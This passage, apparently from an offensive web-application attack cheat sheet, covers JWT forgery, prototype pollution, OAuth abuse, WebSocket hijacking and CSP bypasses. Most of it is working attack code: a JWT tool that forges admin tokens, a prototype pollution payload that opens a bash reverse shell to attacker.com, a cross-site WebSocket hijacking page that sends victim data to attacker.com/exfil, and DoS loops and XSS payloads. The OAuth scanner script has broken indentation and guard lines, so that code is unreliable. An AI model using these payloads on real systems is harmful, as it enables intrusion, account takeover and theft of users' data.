      "kty": "RSA",
      "kid": "attacker-key",
      "use": "sig",
      "n": "YOUR_PUBLIC_KEY_N",
      "e": "AQAB"
    }
  ]
}
EOF

# Generate your own RSA key pair
openssl genrsa -out private.pem 2048
openssl rsa -in private.pem -pubout -out public.pem

# Attack 6: X5U (X.509 URL) Header Injection
# Similar to JKU but with X.509 certificate

{
  "alg": "RS256",
  "typ": "JWT",
  "x5u": "https://attacker.com/cert.pem"
}

# Attack 7: JWT Confusion via Multiple Algorithms
# Some libraries accept both algorithms
# Try signing with different algorithms

# OPSEC: Comprehensive JWT testing tool
cat > jwt_attacker.py << 'EOF'
#!/usr/bin/env python3
import jwt
import json
import base64
import sys

class JWTAttacker:
    def __init__(self, token):
        self.token = token
        self.header = jwt.get_unverified_header(token)
        self.payload = jwt.decode(token, options={"verify_signature": False})
        
    def display_info(self):
        """Display JWT information"""
        print("[*] JWT Information:")
        print(f"    Header: {json.dumps(self.header, indent=6)}")
        print(f"    Payload: {json.dumps(self.payload, indent=6)}")
        
    def none_algorithm_attack(self):
        """Generate token with alg=none"""
        print("\n[*] Attack 1: None Algorithm")
        
        header = self.header.copy()
        header['alg'] = 'none'
        
        # Escalate privileges in payload
        payload = self.payload.copy()
        payload['role'] = 'admin'
        payload['is_admin'] = True
        
        # Encode without signature
        header_b64 = base64.urlsafe_b64encode(
            json.dumps(header).encode()
        ).decode().rstrip('=')
        
        payload_b64 = base64.urlsafe_b64encode(
            json.dumps(payload).encode()
        ).decode().rstrip('=')
        
        malicious_token = f"{header_b64}.{payload_b64}."
        
        print(f"[+] Malicious token: {malicious_token}")
        return malicious_token
        
    def weak_secret_test(self, wordlist=['secret', 'password', 'key', '123456']):
        """Test common weak secrets"""
        print("\n[*] Attack 2: Weak Secret Testing")
        
        for secret in wordlist:
            try:
                jwt.decode(self.token, secret, algorithms=['HS256', 'HS512'])
                print(f"[!] WEAK SECRET FOUND: {secret}")
                
                # Generate admin token
                payload = self.payload.copy()
                payload['role'] = 'admin'
                payload['is_admin'] = True
                
                admin_token = jwt.encode(payload, secret, algorithm='HS256')
                print(f"[+] Admin token: {admin_token}")
                
                return secret
                
            except jwt.InvalidSignatureError:
                pass
            except Exception as e:
                pass
        
        print("[-] No weak secrets found in wordlist")
        return None
        
    def kid_manipulation(self):
        """Test kid parameter manipulation"""
        print("\n[*] Attack 3: Kid Parameter Manipulation")
        
        kid_payloads = [
            "/dev/null",
            "../../dev/null",
            "../../../proc/self/environ",
            "../../../../etc/passwd"
        ]
        
        payload = self.payload.copy()
        payload['role'] = 'admin'
        
        for kid in kid_payloads:
            header = self.header.copy()
            header['kid'] = kid
            
            # Try signing with empty secret (for /dev/null)
            try:
                token = jwt.encode(payload, "", algorithm="HS256", headers=header)
                print(f"[+] Token with kid={kid}:")
                print(f"    {token}")
            except:
                pass
                
    def generate_report(self):
        """Generate full attack report"""
        print("\n" + "="*60)
        print("JWT ATTACK REPORT")
        print("="*60)
        
        self.display_info()
        self.none_algorithm_attack()
        self.weak_secret_test()
        self.kid_manipulation()
        
        print("\n[*] Manual testing recommendations:")
        print("    1. Test token with modified payload")
        print("    2. Try RS256→HS256 confusion if public key available")
        print("    3. Brute force secret with hashcat/john")
        print("    4. Test JKU/X5U header injection if headers present")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <jwt_token>")
        sys.exit(1)
    
    attacker = JWTAttacker(sys.argv[1])
    attacker.generate_report()
EOF

chmod +x jwt_attacker.py
python3 jwt_attacker.py "eyJ0eXAiOiJKV1QiLCJhbGc..."

Prototype Pollution (JavaScript/Node.js)
#

// Prototype Pollution - Critical in Node.js applications

// Detection payload (basic)
{"__proto__": {"polluted": "yes"}}

// After sending, check if pollution worked:
// In Node.js console or via API response:
// console.log({}.polluted) // Should return "yes" if vulnerable

// Attack 1: Property Injection
{
  "__proto__": {
    "isAdmin": true,
    "role": "admin"
  }
}

// Attack 2: XSS via Prototype Pollution
{
  "__proto__": {
    "innerHTML": "<img src=x onerror=alert(1)>"
  }
}

// Attack 3: DoS via Prototype Pollution
{
  "__proto__": {
    "toString": null
  }
}
// This breaks toString() for all objects

// Attack 4: RCE via Prototype Pollution (Node.js)
// Pollute process environment variables
{
  "__proto__": {
    "env": {
      "NODE_OPTIONS": "--require /tmp/malicious.js"
    }
  }
}

// Attack 5: Command Injection via child_process
{
  "__proto__": {
    "shell": "/bin/bash",
    "argv0": "bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"
  }
}

// OPSEC: Automated Prototype Pollution testing
cat > prototype_pollution_test.js << 'EOF'
const axios = require('axios');

async function testPrototypePollution(url) {
    console.log('[*] Testing for Prototype Pollution');
    
    // Test payloads
    const payloads = [
        { "__proto__": { "polluted": "test1" } },
        { "constructor": { "prototype": { "polluted": "test2" } } },
        { "__proto__": { "isAdmin": true } },
        { "__proto__": { "role": "admin" } }
    ];
    
    for (let payload of payloads) {
        try {
            console.log(`\n[*] Testing payload: ${JSON.stringify(payload)}`);
            
            const response = await axios.post(url, payload, {
                headers: { 'Content-Type': 'application/json' }
            });
            
            console.log(`[+] Status: ${response.status}`);
            
            // Check if pollution occurred (send second request)
            const checkResponse = await axios.get(url + '/check');
            
            if (checkResponse.data.polluted || 
                checkResponse.data.isAdmin || 
                checkResponse.data.role === 'admin') {
                console.log('[!] VULNERABLE: Prototype Pollution detected!');
                console.log(`[!] Polluted properties: ${JSON.stringify(checkResponse.data)}`);
            }
            
        } catch (error) {
            console.log(`[-] Error: ${error.message}`);
        }
    }
}

// Usage
const targetUrl = process.argv[2] || 'http://target.com/api/merge';
testPrototypePollution(targetUrl);
EOF

# Alternative Python version
cat > prototype_pollution_test.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
import sys

def test_prototype_pollution(url):
    """Test for prototype pollution vulnerabilities"""
    
    print("[*] Testing for Prototype Pollution")
    
    payloads = [
        {"__proto__": {"polluted": "test"}},
        {"__proto__": {"isAdmin": True}},
        {"__proto__": {"role": "admin"}},
        {"constructor": {"prototype": {"polluted": "test"}}},
        {"__proto__": {"toString": "polluted"}},
    ]
    
    headers = {'Content-Type': 'application/json'}
    
    for payload in payloads:
        print(f"\n[*] Testing payload: {json.dumps(payload)}")
        
        try:
            # Send pollution payload
            r = requests.post(url, json=payload, headers=headers)
            print(f"[+] Status: {r.status_code}")
            
            # Check if pollution worked
            check = requests.get(url + '/check')
            response_json = check.json() if check.status_code == 200 else {}
            
            if 'polluted' in str(response_json) or \
               response_json.get('isAdmin') or \
               response_json.get('role') == 'admin':
                print("[!] VULNERABLE: Prototype Pollution detected!")
                print(f"[!] Response: {json.dumps(response_json, indent=2)}")
                
        except Exception as e:
            print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)
    
    test_prototype_pollution(sys.argv[1])
EOF

chmod +x prototype_pollution_test.py
python3 prototype_pollution_test.py http://target.com/api/merge

OAuth 2.0 / OpenID Connect Attacks
#

# OAuth 2.0 Attack Vectors

# Attack 1: Redirect URI Manipulation
# Original: redirect_uri=https://client.com/callback
# Attacks:
redirect_uri=https://attacker.com/callback
redirect_uri=https://client.com.attacker.com/callback
redirect_uri=https://client.com@attacker.com/callback
redirect_uri=https://client.com#attacker.com
redirect_uri=https://client.com.evil.com

# Open redirect chaining:
redirect_uri=https://client.com/redirect?url=https://attacker.com

# Attack 2: State Parameter Bypass (CSRF)
# If state parameter missing or not validated:

# Step 1: Attacker initiates OAuth flow
https://oauth-provider.com/authorize?client_id=CLIENT&redirect_uri=https://client.com/callback&scope=read

# Step 2: Attacker gets authorization code but doesn't complete
# Step 3: Victim clicks attacker's link with attacker's code
https://client.com/callback?code=ATTACKER_CODE

# Step 4: Victim's account linked to attacker's OAuth account

# Attack 3: Scope Escalation
# Original: scope=read:profile
# Attacks:
scope=read:profile write:profile admin:all
scope=*
scope=read:profile,admin:all

# Attack 4: Client Secret Exposure
# Search for exposed secrets in:
# - JavaScript files
# - Mobile app decompilation
# - GitHub repositories
# - Environment variable leaks

# Common locations:
grep -r "client_secret" /path/to/app/
grep -r "oauth" /path/to/app/ | grep -i "secret"

# Attack 5: Authorization Code Interception
# If redirect_uri uses HTTP instead of HTTPS:
redirect_uri=http://client.com/callback  # Intercept via MITM

# Attack 6: Implicit Flow Token Theft (deprecated but still used)
# Tokens in URL fragments can be stolen via:
# - Referer headers
# - Browser history
# - Open redirects

# Example: Force open redirect after OAuth
https://oauth-provider.com/authorize?...&redirect_uri=https://client.com/redirect?next=https://attacker.com

# OPSEC: OAuth vulnerability scanner
cat > oauth_scanner.py << 'EOF'
#!/usr/bin/env python3
import requests
from urllib.parse import urlparse, parse_qs, urlencode
import sys

def test_oauth_vulnerabilities(auth_url):
    """Test OAuth 2.0 implementation for vulnerabilities"""
    
    print(f"[*] Testing OAuth endpoint: {auth_url}")
    
    parsed = urlparse(auth_url)
    params = parse_qs(parsed.query)
    
    vulnerabilities = []
    
    # Test 1: Redirect URI manipulation
    print("\n[*] Test 1: Redirect URI Manipulation")
    
    redirect_tests = [
        'https://attacker.com',
        'https://evil.com',
        'http://localhost',
        'https://client.com.evil.com',
    ]
    
    for redirect in redirect_tests:
        test_params = params.copy()
        test_params['redirect_uri'] = [redirect]
        
        test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{urlencode(test_params, doseq=True)}"
        
        try:
            r = requests.get(test_url, allow_redirects=False, timeout=5)
            
            if r.status_code in [302, 301]:
                location = r.headers.get('Location', '')
                if redirect in location:
                    print(f"[!] VULNERABLE: Redirect accepted to {redirect}")
                    vulnerabilities.append({
                        'type': 'open_redirect',
                        'redirect_uri': redirect
                    })
                    
        except Exception as e:
            pass
    
    # Test 2: Check if state parameter present
    print("\n[*] Test 2: State Parameter Check")
    
    if 'state' not in params or not params['state']:
        print("[!] WARNING: State parameter missing (CSRF vulnerable)")
        vulnerabilities.append({
            'type': 'missing_state',
            'description': 'No CSRF protection via state parameter'
            })
        else:
            print("[+] State parameter present")
    
    # Test 3: Scope escalation
    print("\n[*] Test 3: Scope Escalation")

    scope_tests = [
        'admin',
        'admin:all',
        '*',
        'read write admin'
    ]

    for scope in scope_tests:
        test_params = params.copy()
        test_params['scope'] = [scope]

        test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{urlencode(test_params, doseq=True)}"

        try:
            r = requests.get(test_url, allow_redirects=False, timeout=5)

            if r.status_code in [200, 302]:
                print(f"[+] Scope '{scope}' accepted (Status: {r.status_code})")
                vulnerabilities.append({
                    'type': 'scope_escalation',
                    'scope': scope
                })

        except Exception as e:
            pass

    # Test 4: Check for HTTP redirect_uri
    print("\n[*] Test 4: HTTP Redirect URI (Insecure)")

    if 'redirect_uri' in params:
        redirect_uri = params['redirect_uri'][0]
        if redirect_uri.startswith('http://'):
            print(f"[!] CRITICAL: Redirect URI uses HTTP: {redirect_uri}")
            vulnerabilities.append({
                'type': 'http_redirect_uri',
                'uri': redirect_uri
            })

    # Generate report
    print("\n" + "="*60)
    print("OAUTH VULNERABILITY REPORT")
    print("="*60)

    if vulnerabilities:
        print(f"\n[!] Found {len(vulnerabilities)} vulnerabilities:\n")
        for i, vuln in enumerate(vulnerabilities, 1):
            print(f"{i}. {vuln['type'].upper()}")
            for key, value in vuln.items():
                if key != 'type':
                    print(f"   {key}: {value}")
            print()
    else:
        print("\n[+] No obvious vulnerabilities detected")

    return vulnerabilities    

if name == "main":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <oauth_authorization_url>")
        print(f"Example: {sys.argv[0]} 'https://oauth.com/authorize?client_id=123&redirect_uri=...'")
        sys.exit(1)
        test_oauth_vulnerabilities(sys.argv[1])
EOF

chmod +x oauth_scanner.py

WebSocket Security
#

// WebSocket Attack Vectors

// Attack 1: WebSocket Connection Hijacking
var ws = new WebSocket('wss://target.com/ws');

ws.onopen = function() {
    console.log('[+] WebSocket connected');
    
    // Send malicious payloads
    ws.send('{"type":"admin","command":"delete_user","user_id":"victim"}');
    ws.send('{"action":"transfer","amount":1000,"to":"attacker"}');
};

ws.onmessage = function(event) {
    console.log('[+] Received:', event.data);
};

// Attack 2: CSWSH (Cross-Site WebSocket Hijacking)
// Similar to CSRF but for WebSocket connections

cat > cswsh_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
    <title>CSWSH PoC</title>
</head>
<body>
    <h1>Cross-Site WebSocket Hijacking</h1>
    <div id="output"></div>
    
    <script>
    // Exploit WebSocket that relies on cookies for authentication
    var ws = new WebSocket('wss://target.com/ws');
    
    ws.onopen = function() {
        console.log('[+] WebSocket hijacked!');
        document.getElementById('output').innerHTML += '<p>Connected to target WebSocket</p>';
        
        // Send malicious commands
        ws.send(JSON.stringify({
            action: 'get_messages',
            user_id: 'victim'
        }));
        
        ws.send(JSON.stringify({
            action: 'transfer_funds',
            amount: 1000,
            to: 'attacker'
        }));
    };
    
    ws.onmessage = function(event) {
        console.log('[+] Data received:', event.data);
        
        // Exfiltrate data
        fetch('https://attacker.com/exfil', {
            method: 'POST',
            body: event.data
        });
        
        document.getElementById('output').innerHTML += 
            '<p>Received: ' + event.data + '</p>';
    };
    
    ws.onerror = function(error) {
        console.log('[-] Error:', error);
    };
    </script>
</body>
</html>
EOF

// Attack 3: WebSocket Message Manipulation
// Intercept and modify WebSocket messages using Burp Suite

// Attack 4: WebSocket Smuggling
// Send oversized or malformed messages
ws.send('A'.repeat(1000000)); // Large payload
ws.send('\x00\x00\x00'); // Null bytes
ws.send('{"incomplete":'); // Malformed JSON

// Attack 5: WebSocket Denial of Service
// Rapid connection/disconnection
for(let i = 0; i < 1000; i++) {
    let ws = new WebSocket('wss://target.com/ws');
    ws.onopen = function() {
        ws.close();
    };
}

// OPSEC: WebSocket security testing tool
cat > websocket_tester.py << 'EOF'
#!/usr/bin/env python3
import asyncio
import websockets
import json
import sys

async def test_websocket_security(uri):
    """Test WebSocket endpoint for security issues"""
    
    print(f"[*] Testing WebSocket: {uri}")
    
    try:
        # Test 1: Basic connection
        print("\n[*] Test 1: Connection Test")
        async with websockets.connect(uri) as ws:
            print("[+] Successfully connected")
            
            # Test 2: Authentication bypass
            print("\n[*] Test 2: Authentication Bypass")
            
            auth_payloads = [
                {"action": "authenticate", "token": "invalid"},
                {"action": "authenticate", "user_id": "admin"},
                {"action": "get_user_data", "user_id": 1},
                {"action": "get_user_data", "user_id": "admin"}
            ]
            
            for payload in auth_payloads:
                await ws.send(json.dumps(payload))
                try:
                    response = await asyncio.wait_for(ws.recv(), timeout=2.0)
                    print(f"[+] Payload: {payload}")
                    print(f"    Response: {response[:100]}")
                except asyncio.TimeoutError:
                    print(f"[-] Timeout for payload: {payload}")
            
            # Test 3: Message injection
            print("\n[*] Test 3: Command Injection")
            
            injection_payloads = [
                {"command": "delete_user", "user_id": "victim"},
                {"action": "admin_command", "cmd": "shutdown"},
                {"type": "sql", "query": "' OR 1=1--"},
                {"action": "xss", "data": "<script>alert(1)</script>"}
            ]
            
            for payload in injection_payloads:
                await ws.send(json.dumps(payload))
                try:
                    response = await asyncio.wait_for(ws.recv(), timeout=2.0)
                    if 'error' not in response.lower():
                        print(f"[!] Potential vulnerability with: {payload}")
                        print(f"    Response: {response[:100]}")
                except asyncio.TimeoutError:
                    pass
            
            # Test 4: Large payload (DoS)
            print("\n[*] Test 4: Large Payload Test")
            large_payload = "A" * 1000000
            try:
                await ws.send(large_payload)
                print("[+] Large payload sent (1MB)")
                response = await asyncio.wait_for(ws.recv(), timeout=5.0)
                print(f"[+] Server handled large payload: {len(response)} bytes")
            except Exception as e:
                print(f"[!] Large payload caused error: {e}")
                
    except Exception as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <websocket_uri>")
        print(f"Example: {sys.argv[0]} wss://target.com/ws")
        sys.exit(1)
    
    asyncio.run(test_websocket_security(sys.argv[1]))
EOF

chmod +x websocket_tester.py

Content Security Policy (CSP) Bypasses
#

<!-- CSP Bypass Techniques -->

<!-- Bypass 1: JSONP Endpoint Abuse (if whitelisted domain has JSONP) -->
<script src="https://trusted-site.com/jsonp?callback=alert"></script>
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert"></script>
<script src="https://www.google.com/complete/search?client=chrome&jsonp=alert"></script>

<!-- Bypass 2: Open Redirect on Whitelisted Domain -->
<script src="https://trusted-site.com/redirect?url=https://evil.com/xss.js"></script>

<!-- Bypass 3: Base Tag Injection (if base-uri not restricted) -->
<base href="https://evil.com/">
<script src="/malicious.js"></script>

<!-- Bypass 4: Dangling Markup (if unsafe-inline blocked but quotes not encoded) -->
<img src='https://attacker.com/collect?html=
<!-- Everything after this is sent as query parameter -->

<!-- Bypass 5: AngularJS Sandbox Bypass (if Angular loaded) -->
{{constructor.constructor('alert(1)')()}}
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
{{$on.constructor('alert(1)')()}}

<!-- Angular 1.6+ sandbox escape -->
{{[].pop.constructor('alert(1)')()}}

<!-- Bypass 6: Script Gadgets (if popular libraries loaded) -->
<!-- jQuery CSP bypass -->
<div data-src="xss"><script src="jquery.js"></script></div>

<!-- Prototype.js CSP bypass -->
<form action="javascript:alert(1)"><button>Click</button></form>

<!-- Bypass 7: Nonce Prediction/Reuse -->
<!-- If CSP uses nonce but nonce is predictable or reusable -->
<script nonce="PREDICTED_NONCE">alert(1)</script>

<!-- Bypass 8: 'strict-dynamic' Misuse -->
<!-- If script with valid nonce loads attacker-controlled script -->
<script nonce="VALID_NONCE">
var s = document.createElement('script');
s.src = 'https://evil.com/xss.js';
document.body.appendChild(s);  // Allowed due to strict-dynamic
</script>

<!-- Bypass 9: RPO (Relative Path Overwrite) -->
<!-- If CSP allows 'self' and path-relative stylesheets exist -->
http://site.com/page/..%2fstyle.css%0a<script>alert(1)</script>

<!-- Bypass 10: Service Worker CSP Bypass -->
<script>
if ('serviceWorker' in navigator) {
    navigator.serviceWorker.register('/sw.js').then(() => {
        // Service Worker can modify CSP headers of subsequent requests
    });
}
</script>

<!-- Bypass 11: Iframe Injection (if frame-src not restricted) -->
<iframe src="javascript:alert(document.domain)"></iframe>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

<!-- Bypass 12: Object/Embed Tag Abuse -->
<object data="data:text/html,<script>alert(1)</script>"></object>
<embed src="data:text/html,<script>alert(1)</script>">

<!-- OPSEC: CSP bypass testing script -->
cat > csp_bypass_tester.py << 'EOF'
#!/usr/bin/env python3
import requests
import sys
from bs4 import BeautifulSoup

def test_csp_bypasses(url):
    """Test for CSP bypass vulnerabilities"""
    
    print(f"[*] Testing CSP on {url}")
    
    try:
        r = requests.get(url, timeout=5)
        csp = r.headers.get('Content-Security-Policy', '')
        
        if not csp:
            print("[!] WARNING: No CSP header found")
            return
        
        print(f"[*] CSP Policy: {csp}")
        print()
        
        # Check for common misconfigurations
        issues = []
        
        # Check 1: unsafe-inline
        if 'unsafe-inline' in csp:
            print("[!] ISSUE: 'unsafe-inline' detected (allows inline scripts)")
            issues.append('unsafe-inline')
        
        # Check 2: unsafe-eval
        if 'unsafe-eval' in csp:
            print("[!] ISSUE: 'unsafe-eval' detected (allows eval())")
            issues.append('unsafe-eval')
        
        # Check 3: Wildcard sources
        if '*' in csp and 'script-src' in csp:
            print("[!] ISSUE: Wildcard in script-src")
            issues.append('wildcard-script-src')
        
        # Check 4: data: URI
        if 'data:' in csp:
            print("[!] ISSUE: 'data:' URI allowed")
            issues.append('data-uri')
        
        # Check 5: Missing base-uri
        if 'base-uri' not in csp:
            print("[!] ISSUE: 'base-uri' not defined (base tag injection possible)")
            issues.append('missing-base-uri')
        
        # Check 6: Check for known JSONP endpoints in whitelist
        jsonp_domains = [
            'google.com',
            'googleapis.com',
            'gstatic.com',
            'accounts.google.com'
        ]
        
        for domain in jsonp_domains:
            if domain in csp:
                print(f"[!] ISSUE: Whitelisted domain with JSONP: {domain}")
                issues.append(f'jsonp-{domain}')
        
        # Check 7: Nonce without strict-dynamic
        if 'nonce-' in csp and 'strict-dynamic' not in csp:
            print("[!] INFO: Nonce used without strict-dynamic (potential bypass)")
        
        # Check for reflected content
        print("\n[*] Checking for reflected parameters...")
        
        test_params = {
            'q': '<script>alert(1)</script>',
            'search': '<img src=x onerror=alert(1)>',
            'callback': 'alert'
        }
        
        for param, payload in test_params.items():
            test_url = f"{url}?{param}={payload}"
            r_test = requests.get(test_url, timeout=5)
            
            if payload in r_test.text:
                print(f"[!] Parameter '{param}' reflected (potential CSP bypass if inline blocked)")
        
        # Generate bypass recommendations
        print("\n" + "="*60)
        print("CSP BYPASS RECOMMENDATIONS")
        print("="*60)
        
        if 'unsafe-inline' in issues:
            print("\n1. Direct inline script injection")
            print("   <script>alert(1)</script>")
        
        if 'data-uri' in issues:
            print("\n2. Data URI bypass")
            print('   <script src="data:text/javascript,alert(1)"></script>')
        
        if 'missing-base-uri' in issues:
            print("\n3. Base tag injection")
            print('   <base href="https://evil.com/">')
        
        if any('jsonp' in i for i in issues):
            print("\n4. JSONP endpoint abuse")
            print('   <script src="https://accounts.google.com/o/oauth2/revoke?callback=alert"></script>')
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)
    
    test_csp_bypasses(sys.argv[1])
EOF

chmod +x csp_bypass_tester.py
python3 csp_bypass_tester.py https://target.com

#